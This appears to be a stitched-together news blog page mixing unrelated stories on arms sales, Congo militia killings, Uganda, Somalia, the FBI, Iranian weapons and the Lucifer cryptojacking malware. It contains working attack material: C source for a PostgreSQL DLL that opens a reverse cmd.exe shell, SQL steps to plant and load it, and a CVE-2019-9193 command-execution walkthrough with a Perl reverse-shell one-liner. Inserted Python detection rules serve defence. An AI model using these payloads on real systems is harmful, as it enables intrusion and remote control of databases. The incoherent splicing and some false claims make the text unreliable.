Tuesday, June 30, 2020

Boeing has won a nearly $440 million contract to build new Apache AH-64E ground support combat helicopters for Morocco

Boeing has won a nearly $440 million contract to build new Apache AH-64E ground support combat helicopters for Morocco, the Department of Defence announced in a press release.

"The Boeing Company of Mesa, Arizona was awarded a $439,179,677 modification contract for new-build Apache AH-64E aircraft and Longbow crew trainers", the release said on Thursday.
Fiscal Year 2020 Foreign Military Sales for Morocco for the full cost of the sale were obligated at the time of the award, the Defence Department added.
Work on the contract will be performed in Mesa in the US state of Arizona over the next five years with an estimated completion date of 1 March 2025, the release said.
On 14 May, Boeing won two cruise missile contracts worth over $2.6 billion combined to support foreign military sales to Saudi Arabia, Japan, India, South Korea, Qatar, Brazil, and The Netherlands.

The head of office of MONUSCO in Ituri, Cecilia Piazza, condemns insecurity and killings by militiamen in Ituri and calls on the UN to establish another office in the province

The head of office of MONUSCO in Ituri, Cecilia Piazza, gave an overall review of the work of the UN mission in this province during the two years of her mandate at a press briefing on Monday, June 29, 2020 in Bunia.
Although "not perfect", she judges the results of her institution to be "satisfactory".
Context of her arrival in Ituri.
It was the day after the outbreak of the atrocities in Djugu that Ms. Cecilia set foot in Ituri, a province plagued by insecurity. For two years, she managed in a "tense" context, with CODECO militia activism "an ongoing battle".
"Two intense years, just with the start of violence in Djugu. Djugu was at the heart of our work and continues to be," she said.
According to her, the contribution of the UN mission has been of great importance in managing the security situation in Djugu and Mahagi.
In Djugu, several temporary bases have been set up, on the one hand to ensure daily patrols and on the other to protect civilians, in particular displaced people housed in different sites (Blukwa, Bule, Fataki, etc.). An effective means of prevention against rebel attacks.
In the Mahagi territory, the temporary base at Ame, on the border with neighboring Djugu, was of great importance. In this part, very often, the attackers come from Djugu and pass there to commit their crimes.
"This presence helped mitigate the infiltration. We have succeeded in stabilizing this limit between the two territories," she said, while also welcoming the "patrols along the national road N° 27".
Regarding Mahagi, she thinks that beyond the infiltration of CODECO, there are "land-related tensions". These must be resolved in the interest of lasting stability.
Peace, another process in Ituri.
In each territory, she leaves behind her "many projects in progress". Peace, security, impunity, the protection of civilians, justice, youth, the DDR process, (...) form the main part of MONUSCO's intervention.
Addressing specifically the Djugu stabilization project, which will be executed by STAREC, she insisted on "political commitment and communities" for its "success".
Also, she said, the fight against impunity remains a major priority.
"It is a duty to the victims, to their relatives." Hence, we must "support military justice".
Despite the efforts made, her regret at the end of her tenure was that "violence is still there", she said. "I call on all the perpetrators to stop," insists Ms. Cecilia.
On leaving, she did not fail to salute the welcome and collaboration that all social strata of Ituri have shown towards MONUSCO since her arrival: from the people to civil society to the provincial government.
From Bunia, in Ituri, Ms Piazza will go to Beni, in North Kivu, where she will take on a new responsibility within the UN mission.
A new head of office is therefore expected in the coming days at the capital of Ituri, at the head of MONUSCO, in a province where insecurity is still persistent.


MONUSCO paid tribute to Sergeant Major Wahyudi Rama from the Indonesian contingent, killed on June 22, in an attack by armed men not far from the Semuliki bridge, on the road to Beni-Kasindi, the territory of Beni, North Kivu province. The tribute ceremony was organized on Saturday, June 27, at Beni airport, in the presence of both civilian and military officials of the UN Mission in DRC.
MONUSCO Force Commander, Lieutenant-General Augusto Ferreira Costa Neves; the Commander of the MONUSCO Integrated Force Brigade, Major-General Patrick Dube, and the Acting Mayor of the City of Beni, Modeste Bakwanamaha, took part in the tribute ceremony.

President Museveni ranked among the best presidents of the world

President Yoweri Kaguta Museveni has been ranked among the best Presidents in the world, according to New York University and World Bank experts who ranked the President 7th in terms of influencing economic growth.
The report, first released in May 2018 by World Bank economist Steve Pennings and New York University Economics Professor William Easterly, indicates that Museveni is one of the best leaders with a significant positive impact on their countries' economic growth.
The two experts define the best leaders as any leaders for whom the estimated leader effect is positive and significant at the 95% level, and the worst leaders as those with negative and insignificant leader effects.
The findings, entitled “Shrinking dictators: how much economic growth can we attribute to national leaders”, ranked Senior General Than Shwe of Burma as number one, the most influential leader, who steered his country's economic growth at 3.95% with a shrinkage of just 0.71%. He was the head of state of Burma between 1992 and 2011 as chairman of the State Peace and Development Council (SPDC).
“Leadership requires bold initiatives and President Museveni must be credited for this. It requires stringent and well thought out policies to reverse the decline our country was in and revamp the economy. It's not surprising that Museveni has firmly put this country on a steady economic growth path,” Stephen Miyingo, the Senior Presidential Advisor on Economic Affairs, said of the report. He said the report provides a third-party independent opinion which confirms what the NRM government has been telling Ugandans.
Easterly and Pennings ranked 24 world leaders and President Museveni came in 7th position, scoring higher than many powerful leaders globally, including the former Prime Minister of Singapore Lee Kuan Yew and Park Chung-hee, President of South Korea between 1963 and 1979. Museveni's significant contribution to Uganda's economic growth is said to be a record 2.42% with a shrinkage of only 0.78% since he came to power in 1986.
The report also established that leaders like Yoweri Museveni and Seretse Khama of Botswana rank higher than Lee Kuan Yew of Singapore partly because they did well relative to the lower average regional growth in Sub-Saharan Africa compared to East and South Asia.
While making its assessment of Museveni's contribution, the report highlighted infrastructure development, now at its peak with 5,350 km of paved roads compared to 987 km in 1986. The general quality of life and standard of living have improved tremendously, together with an increase in incomes despite population growth.
Other sectors highlighted include employment, with the national employment rate falling from 11% to 8%; access to the electricity grid, which increased to 22% in 2017 from 14% in 2013; and access to water, which rose from 68% to 78% during the same period. Revenue collections per annum have also increased: for instance, in 2005/06 the total revenue collected was Shs 2.23 trillion compared to the estimated Shs 20 trillion to be collected next financial year.
The report also highlighted the robust peace and security under Museveni, which has been credited for the prevailing economic growth, as well as the restoration of freedom of speech, press freedom, freedom of worship, relative democracy, effective foreign policy, education and tourism.

Monday, June 29, 2020

Lucifer malware also mines Monero cryptocurrency on infected devices and can drop/run leaked NSA (National Security Agency, the USA's national-level intelligence agency) exploits, including DoublePulsar, EternalBlue, and EternalRomance, against vulnerable devices to enable intranet infection.

Palo Alto Networks’ Unit 42 researchers have discovered a new version of a “hybrid crypto-jacking malware,” which they have dubbed “Lucifer.”
Lucifer is capable of launching DDoS attacks and can attack vulnerable Windows hosts using a variety of flaws of a “trivial-to-exploit nature,” most of which are rated either ‘high’ or ‘critical.’
The first wave of this campaign was blocked by Palo Alto Networks on 10 June 2020, but the attacker resumed the campaign the very next day with an upgraded version of Lucifer malware. The campaign is still active and wreaking havoc by targeting Windows computers to mine for cryptocurrency and launching intense DDoS attacks.
Palo Alto Networks’ researchers observed that the new variant of Lucifer is immensely powerful: it performs crypto-jacking by dropping XMRig to mine Monero, connects to a C&C server, and self-propagates by exploiting multiple vulnerabilities and brute-forcing credentials.
Furthermore, it can drop/run leaked NSA exploits including DoublePulsar, EternalBlue, and EternalRomance against vulnerable devices to enable intranet infection.
“Once exploited, the attacker can execute arbitrary commands on the vulnerable device. In this case, the targets are Windows hosts on both the internet and intranet, given that the attacker is leveraging certutil utility in the payload for malware propagation,” the researchers said in a blog post.


NSA exploits in action:

The malware developer named it Satan DDoS, but since Satan ransomware already exists, Palo Alto researchers chose to name it Lucifer.
The good news is that patches for the weaponized vulnerabilities are already available, but hosts that haven’t been updated yet are still vulnerable to crypto-jacking. Researchers urge users to immediately apply the latest patches and updates to secure their devices.
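The report above says Lucifer drops XMRig and relies on the certutil utility to propagate. As an added defensive example (not code from Unit 42 or from this page), the Python below runs three simple host-level detection rules over process-creation events: certutil invoked as a downloader (-urlcache with -f), certutil used to decode a blob back into a binary, and an XMRig binary starting under its default name. The events, host names, URLs and paths are constructed for the example.

```python
import ntpath
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple


@dataclass
class ProcessEvent:
    """One process-creation event as an EDR or Sysmon (event ID 1) feed would report it."""
    host: str
    parent_image: str
    image: str
    command_line: str


# Constructed sample events written for this example; they are not telemetry
# from the Unit 42 report. Host names, URLs and paths are placeholders.
SAMPLE_EVENTS: List[ProcessEvent] = [
    ProcessEvent("ws-01", r"C:\Windows\explorer.exe",
                 r"C:\Program Files\Mozilla Firefox\firefox.exe",
                 r'"C:\Program Files\Mozilla Firefox\firefox.exe"'),
    ProcessEvent("ws-01", r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\certutil.exe",
                 r"certutil -urlcache -split -f http://stager.example.invalid/x.exe C:\Windows\Temp\svc.exe"),
    ProcessEvent("ws-02", r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\certutil.exe",
                 r"certutil -hashfile C:\tools\setup.msi SHA256"),
    ProcessEvent("srv-03", r"C:\Windows\Temp\svc.exe",
                 r"C:\Windows\Temp\xmrig.exe",
                 r"xmrig.exe -o pool.example.invalid:3333 -u WALLET_PLACEHOLDER"),
    ProcessEvent("ws-01", r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\certutil.exe",
                 r"certutil -decode C:\Windows\Temp\blob.txt C:\Windows\Temp\stage2.exe"),
]


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def certutil_download(ev: ProcessEvent) -> bool:
    """certutil used as a downloader: -urlcache together with -f (force fetch)."""
    return (_basename(ev.image) == "certutil.exe"
            and re.search(r"[-/]urlcache\b", ev.command_line, re.I) is not None
            and re.search(r"(?:^|\s)[-/]f\b", ev.command_line, re.I) is not None)


def certutil_decode(ev: ProcessEvent) -> bool:
    """certutil used to turn a base64 blob back into a binary."""
    return (_basename(ev.image) == "certutil.exe"
            and re.search(r"[-/]decode\b", ev.command_line, re.I) is not None)


def xmrig_miner(ev: ProcessEvent) -> bool:
    """An XMRig binary started under its default name."""
    return _basename(ev.image).startswith("xmrig")


RULES: List[Tuple[str, Callable[[ProcessEvent], bool]]] = [
    ("certutil_download", certutil_download),
    ("certutil_decode", certutil_decode),
    ("xmrig_miner", xmrig_miner),
]


def evaluate(events: List[ProcessEvent]) -> List[Dict[str, str]]:
    """Return one finding per (event, matching rule), in event order."""
    findings = []
    for ev in events:
        for name, predicate in RULES:
            if predicate(ev):
                findings.append({"host": ev.host, "rule": name,
                                 "image": ev.image, "command_line": ev.command_line})
    return findings


if __name__ == "__main__":
    for f in evaluate(SAMPLE_EVENTS):
        print(f"{f['host']}: {f['rule']} <- {f['command_line']}")
```

The legitimate certutil -hashfile call is deliberately left unflagged: the rules key on the download and decode verbs rather than on certutil itself, which keeps the noise down on hosts where administrators use it for certificate work. Renamed miners are out of scope for the name-based rule; CPU-usage or pool-connection telemetry would be the complement.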

Ituri province is on fire! 10 more people were killed by CODECO on the night of Sunday to Monday, 29/06/2020

Attackers from the CODECO militia carried out, on the night of Sunday to Monday, June 29, 2020, an attack in the locality of Mungulumoya, 5 km from the center of Kunda in the Babelebe chiefdom, Irumu territory.
At least 10 civilians were killed and 3 others seriously wounded in this attack with firearms and bladed weapons.
Although the situation is now under the control of the Congolese security forces, the locality remains emptied of its population, which has moved en masse to the center of Kunda, about ten kilometers from the city of Bunia.
Faced with this situation, provincial deputy Claude Malabo urges the Congolese state to better secure the inhabitants, who are being unjustly massacred.
"The army must secure the entities threatened by these enemies of peace. But I believe that we must also succeed in destroying them definitively. The population no longer knows how to live in peace following permanent threats," said this elected representative from Irumu's electoral district.
In addition to Djugu and Mahagi, in recent months certain entities in Irumu territory have also been targeted by this militia, the Cooperation for the Development of Congo (CODECO).

More on that Attack!

#define PG_REVSHELL_CALLHOME_SERVER "127.0.0.1"
#define PG_REVSHELL_CALLHOME_PORT "4444"

/* Must be defined before winsock2.h is included for it to have any effect. */
#define _WINSOCK_DEPRECATED_NO_WARNINGS

#include "postgres.h"
#include <string.h>
#include "fmgr.h"
#include "utils/geo_decls.h"
#include <winsock2.h>
#pragma comment(lib, "ws2_32")

#ifdef PG_MODULE_MAGIC
PG_MODULE_MAGIC;
#endif

#pragma warning(push)
#pragma warning(disable: 4996)

/* Runs when the server process loads the DLL: connects to the call-home
 * address and starts cmd.exe with its standard handles bound to the socket. */
BOOL WINAPI DllMain(_In_ HINSTANCE hinstDLL, _In_ DWORD fdwReason, _In_ LPVOID lpvReserved)
{
    WSADATA wsaData;
    SOCKET wsock;
    struct sockaddr_in server;
    struct hostent *host;
    char ip_addr[16];
    STARTUPINFOA startupinfo;
    PROCESS_INFORMATION processinfo;

    char *program = "cmd.exe";
    const char *ip = PG_REVSHELL_CALLHOME_SERVER;
    u_short port = atoi(PG_REVSHELL_CALLHOME_PORT);

    WSAStartup(MAKEWORD(2, 2), &wsaData);
    wsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);

    host = gethostbyname(ip);
    strcpy_s(ip_addr, sizeof(ip_addr), inet_ntoa(*((struct in_addr *)host->h_addr)));

    server.sin_family = AF_INET;
    server.sin_port = htons(port);
    server.sin_addr.s_addr = inet_addr(ip_addr);

    WSAConnect(wsock, (SOCKADDR *)&server, sizeof(server), NULL, NULL, NULL, NULL);

    memset(&startupinfo, 0, sizeof(startupinfo));
    startupinfo.cb = sizeof(startupinfo);
    startupinfo.dwFlags = STARTF_USESTDHANDLES;
    startupinfo.hStdInput = startupinfo.hStdOutput = startupinfo.hStdError = (HANDLE)wsock;

    CreateProcessA(NULL, program, NULL, NULL, TRUE, 0, NULL, NULL, &startupinfo, &processinfo);

    return TRUE;
}
#pragma warning(pop) /* re-enable 4996 */

/* Add a prototype marked PGDLLEXPORT */
PGDLLEXPORT Datum dummy_function(PG_FUNCTION_ARGS);

/* The V1 info macro must name the exported function, otherwise the server
 * treats dummy_function as a version-0 function. */
PG_FUNCTION_INFO_V1(dummy_function);

Datum
dummy_function(PG_FUNCTION_ARGS)
{
    int32 arg = PG_GETARG_INT32(0);

    PG_RETURN_INT32(arg + 1);
}
Here is the convoluted process of exploitation:

postgres=# CREATE TABLE hextable (hex bytea);
postgres=# CREATE TABLE lodump (lo OID);

acidic@emma:~/$ echo "INSERT INTO hextable (hex) VALUES (decode('`xxd -p pg_revshell.dll | tr -d '\n'`', 'hex'));" > sql.txt
acidic@emma:~/$ psql -U postgres --host=localhost --file=sql.txt

-- lo_from_bytea() turns the bytea into a large object and returns its OID;
-- a bytea cannot be inserted into an OID column directly.
postgres=# INSERT INTO lodump SELECT lo_from_bytea(0, hex) FROM hextable;
postgres=# SELECT * FROM lodump;
  lo
-------
 16409
(1 row)
postgres=# SELECT lo_export(16409, 'C:\Program Files\PostgreSQL\9.5\Bin\pg_revshell.dll');
postgres=# CREATE OR REPLACE FUNCTION dummy_function(int) RETURNS int AS
           'C:\Program Files\PostgreSQL\9.5\Bin\pg_revshell.dll', 'dummy_function' LANGUAGE C STRICT;

Arbitrary command execution on PostgreSQL

PostgreSQL, commonly known as Postgres, is one of the largest and most popular database systems in the world. It is the primary database of Mac OS X but also has Linux and Windows versions available.
I have been dealing with PostgreSQL for some time, and I have been keenly monitoring a less well known ‘feature’ (CVE-2019-9193) which allows certain database users to gain arbitrary code execution in the context of the user running the Postgres instance. It is enabled by default on all versions of PostgreSQL from 9.3 through to the latest, 11.2, and it affects all operating systems: Windows, Linux and Mac.
Since version 9.3, new functionality for ‘COPY TO/FROM PROGRAM’ was implemented. This allows the database superuser, and any user in the ‘pg_execute_server_program’ group to run arbitrary operating system commands. This effectively means there is no separation of privilege between a database superuser user and the user running the database on the operating system.
This is a lack of defense in depth which we used to see in Microsoft SQL Server back in the early 2000s, when the xp_cmdshell function was enabled by default. This was patched and disabled by default in Microsoft SQL Server 2005, but it is interesting how the same bugs repeat, seemingly in cycles.
As this bug/flaw/functionality/exploit is somewhere between a privilege escalation and an arbitrary code execution, it needs some kind of prior authentication. This is achieved either through access to the database with credentials, or via exploiting an SQL injection in an application which has PostgreSQL on the backend. Again, in both of these instances either the superuser or a user with ‘pg_execute_server_program’ permissions needs to be in use.
To perform the attack, you simply follow these steps:
1) [Optional] Drop the table you want to use if it already exists
DROP TABLE IF EXISTS cmd_exec;
2) Create the table you want to hold the command output
CREATE TABLE cmd_exec(cmd_output text);
3) Run the system command via the COPY FROM PROGRAM function
COPY cmd_exec FROM PROGRAM 'id';
4) [Optional] View the results
SELECT * FROM cmd_exec;
5) [Optional] Clean up after yourself
DROP TABLE IF EXISTS cmd_exec;
Note that any single quotes inside your command must be doubled to escape them, so for example if you wanted to run:
echo 'hello';
You would need to put it inside single quotes, and then replace all single quotes inside with double single quotes:
'echo ''hello'';'
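As an added defensive example (not code from this write-up or from the earlier DLL post), the Python below runs three detection rules over a PostgreSQL statement log: COPY ... FROM/TO PROGRAM (the CVE-2019-9193 steps above), lo_export() to a server-side path, and CREATE FUNCTION ... LANGUAGE C pointing at a library (the pg_revshell.dll sequence in the earlier post). The log excerpt, role names and PIDs are constructed; the example assumes log_statement = 'all' and a log_line_prefix of '%m [%p] %u ' so the role appears in each line.

```python
import re
from typing import Dict, List, Optional

# Constructed excerpt of a PostgreSQL server log with log_statement = 'all' and
# log_line_prefix = '%m [%p] %u ' (the default prefix plus the role name).
# Sample data written for this example, not logs from the original write-up.
SAMPLE_LOG = r"""
2020-06-29 10:12:01.101 UTC [4242] app_ro LOG:  statement: SELECT * FROM orders WHERE id = 7;
2020-06-29 10:12:05.334 UTC [4242] postgres LOG:  statement: CREATE TABLE cmd_exec(cmd_output text);
2020-06-29 10:12:05.901 UTC [4242] postgres LOG:  statement: COPY cmd_exec FROM PROGRAM 'id';
2020-06-29 10:12:09.002 UTC [4251] etl LOG:  statement: COPY staging FROM '/var/lib/postgresql/import.csv' CSV;
2020-06-29 10:12:11.478 UTC [4242] postgres LOG:  statement: copy cmd_exec from program 'echo ''hello''';
2020-06-29 10:12:15.610 UTC [4260] report LOG:  statement: COPY (SELECT 1) TO PROGRAM 'gzip > /tmp/out.gz';
2020-06-29 10:12:20.009 UTC [4242] postgres LOG:  statement: SELECT lo_export(16409, 'C:\Program Files\PostgreSQL\9.5\Bin\pg_revshell.dll');
2020-06-29 10:12:21.500 UTC [4242] postgres LOG:  statement: CREATE OR REPLACE FUNCTION dummy_function(int) RETURNS int AS 'C:\Program Files\PostgreSQL\9.5\Bin\pg_revshell.dll', 'dummy_function' LANGUAGE C STRICT;
2020-06-29 10:12:30.000 UTC [4270] dba LOG:  statement: CREATE EXTENSION IF NOT EXISTS pgcrypto;
"""

# A single-quoted SQL literal; an embedded quote is written as '' (two quotes),
# which is the escaping rule the steps above describe.
SQL_LITERAL = r"'(?P<arg>(?:[^']|'')*)'"

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<role>\S+) LOG:\s+statement: (?P<stmt>.*)$")

RULES = [
    # COPY ... FROM/TO PROGRAM '<command>': the server runs <command> as its own OS user.
    ("copy_program",
     re.compile(r"\bCOPY\b.*?\b(?:FROM|TO)\s+PROGRAM\s+" + SQL_LITERAL, re.I | re.S)),
    # lo_export(<oid>, '<path>'): writes a large object onto the server's filesystem.
    ("lo_export",
     re.compile(r"\blo_export\s*\(\s*[^,]+,\s*" + SQL_LITERAL, re.I)),
    # CREATE FUNCTION ... AS '<library>' ... LANGUAGE C: loads a native library into the server.
    ("c_function",
     re.compile(r"\bCREATE\b.*?\bFUNCTION\b.*?\bAS\s+" + SQL_LITERAL + r".*?\bLANGUAGE\s+C\b",
                re.I | re.S)),
]


def unescape_literal(text: str) -> str:
    """Undo SQL quote doubling so the reported value is what the server actually saw."""
    return text.replace("''", "'")


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Return a finding for a statement log line that matches a rule, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    for name, pattern in RULES:
        hit = pattern.search(m.group("stmt"))
        if hit:
            return {"timestamp": m.group("ts"), "pid": m.group("pid"), "role": m.group("role"),
                    "rule": name, "argument": unescape_literal(hit.group("arg"))}
    return None


def scan_log(log_text: str) -> List[Dict[str, str]]:
    """All findings in a log excerpt, in log order."""
    return [f for f in (parse_line(ln) for ln in log_text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['timestamp']} pid={f['pid']} role={f['role']} {f['rule']}: {f['argument']!r}")
```

The plain file COPY from a CSV path is not reported, only the PROGRAM form, and the lower-case variant is caught because the patterns are case-insensitive. Since the text above says only superusers and members of pg_execute_server_program can reach COPY FROM PROGRAM, the natural companion to this detector is a periodic review of which login roles hold either privilege.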
I have tested this on all major operating systems, and if a reverse shell is triggered you end up with the following privileges:
Windows - NT AUTHORITY/NETWORK SERVICE (low priv)
Linux - postgres (low priv)
Mac - user that installed postgres (usually an admin)
Linux and Mac OS X can usually be exploited with a Perl one-liner, with a command such as this:
COPY files FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.0.104:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;''';
I have simplified the exploitation process by releasing a new Metasploit module (which should be merged into the main framework soon), as the old postgres_payload modules only work up to around version 8. postgres_copy_from_program_cmd_exec.rb performs all of the above automatically if you provide it with valid database credentials which have the correct permissions. For SQL injections you will have to take the manual route. Here it’s exploiting PostgreSQL 11.2 on Linux Ubuntu 18.04:
For Windows, however, the NETWORK SERVICE user appears not to have any write privileges, but it was still possible to trigger a reverse shell by using a PowerShell download cradle. This can be provided by setting the COMMAND variable to the PowerShell cradle command; take note to escape single quotes with a backslash \.

The Somali National Army seized 4 strategic villages from Al-Shabaab this past weekend

The Somali National Army seized four new strategic villages from the Al-Shabaab militant group in Lower Juba region on Sunday.
Operations conducted by government troops have taken control of several villages, including Janay Abdale, Hilishid, Mayonde and Garasceebe, in Lower Juba region.
Lieutenant Ismail Abdimalik Moalim, commander of the 16th brigade of the Danab forces, said the operations would continue until the troops reached all the areas controlled by Al-Shabaab fighters.
The commander of the Darwish forces in the Jubbaland region told the media that he had begun operations against militias in the central town of Buale but still needed more effort to capture it.
The forces have been conducting operations against Al-Shabaab in the Lower Juba region in recent days to flush out the militant group.

FBI refuses to reveal Christopher Steele’s primary source for his notorious ‘Trump-Russia’ dossier in response to a Freedom of Information request

The identity of the source remains an enduring mystery, but whoever they are, they undoubtedly possess information that could shed light on innumerable inaccuracies in the dossier, which was cited extensively by the Bureau in its various applications for surveillance orders against Donald Trump campaign aide Carter Page.
The US Federal Bureau of Investigation has refused to release documents related to Christopher Steele’s primary source for his notorious ‘Trump-Russia’ dossier in response to a Freedom of Information request filed by The Daily Caller, on the basis the information is classified and risks identifying a confidential FBI source.
The Daily Caller sought all FBI records for an individual identified as “Primary Sub-Source” in Justice Department inspector general Michael Horowitz’s report on Crossfire Hurricane, issued December 2019; the assessment found Steele’s source contradicted and dismissed key allegations made in the dossier after they were tracked down and interviewed by FBI agents in January 2017. The former MI6 operative nonetheless dressed up “rumour and speculation” as fact, and the Justice Department ruled two FISA warrants to be invalid due to the Bureau’s omission of this compromising information.
In its response to the outlet, the FBI cited three exemptions under Freedom of Information laws to deny releasing the sought documents.
“The nature of your request implicates records the FBI compiles pursuant to its national security and foreign intelligence functions. [Disclosure] would trigger harm to national security interests…and/or reveal intelligence sources and methods. Disclosing source related records about an individual or entity could reasonably be expected to undermine the use of confidential sources as it would discourage cooperation with the FBI in the future. Therefore, your request is closed,” the Bureau stated.
It’s unclear if the FBI considers Steele’s source to be a confidential informant, but Steele himself reportedly told partners at Fusion GPS – the opposition research firm that commissioned the dossier – the individual was “well known to US intelligence and law enforcement officials”.
Republican lawmakers investigating the origins of the FBI’s investigation of the Trump campaign have recently accused agency director Christopher Wray of releasing documents about the probe too slowly. For instance, Jim Jordan of the House Judiciary Committee, has accused Wray of outright obstinance, while Lindsey Graham, chair of the Senate Judiciary Committee, wrote Attorney General William Barr on April 20 demanding all documents and communications related to the FBI’s interviews with the source, including FBI reports written about the individual, be released.

Iran creates new army weapons including rocket launchers and missiles

The new weapons, developed by a Revolutionary Guards’ agency responsible for military R&D, have been unveiled amid the Trump administration’s ongoing effort to convince the international community to continue to enforce an arms embargo against Tehran after its October expiry date.
Gen. Ali Koohestani, director of the Revolutionary Guards’ Ground Force Self-Sufficiency Jihad Organization, has given Tasnim News Agency a sneak peek at several new weapons systems for use by infantry formations.
The arms include the Qare’a, a disposable, lightweight rocket launcher made of composite materials, which features a rocket engine-powered 80 mm caliber missile. The weapon is said to have an effective range of 250 meters, and to be ideal for anti-fortification use.

Another of the R&D agency’s designs is a man-portable recoilless rifle dubbed the Nafez-2 (‘Penetrator-2’), a 19 kg anti-armour system which can also be used against enemy emplacements.
Finally, Koohestani unveiled the Ashtar, a unique, lightweight 7.62x64 mm sniper rifle with a range of up to one kilometer and a 24x optical scope.

It’s not clear from the report what stage of development the weapons are in, or whether they have been delivered to the military.
The Tasnim report comes just a day after the IRGC unveiled other arms, including a new armoured personnel carrier, drone and truck-mounted heavy machine-gun, all of them also developed by the Guards’ Ground Force Research and Self-Sufficiency Jihad Organization.
Despite spending just a fraction of what its regional adversaries and the US do on defence, Iran has managed to gain self-sufficiency in a range of areas, becoming one of just a handful of countries capable of building advanced drones and air defence systems, for example. The country began making a push toward self-sufficiency in defence in the 1980s after its US and Western European partners cut Tehran off from its traditional sources of arms following the Iranian Revolution and the Iraqi invasion. Before that, throughout the 1960s and 1970s, the country was one of the largest importers of US weapons systems in the Middle East.
Further moves toward self-sufficiency followed in 2010, after the United Nations Security Council introduced a weapons embargo against the Islamic Republic over its alleged nuclear program.
After 2015 and the signing of the Iran nuclear deal, the UN committed to lift its arms embargo in October 2020. However, beginning earlier this year, the US has lobbied to keep the restrictions in place, going so far as to argue that for all intents and purposes, Washington is still a party to the nuclear deal it withdrew from in 2018. Russian and Chinese diplomats have dismissed US lobbying efforts and hinted that they would veto any American effort to extend the embargo.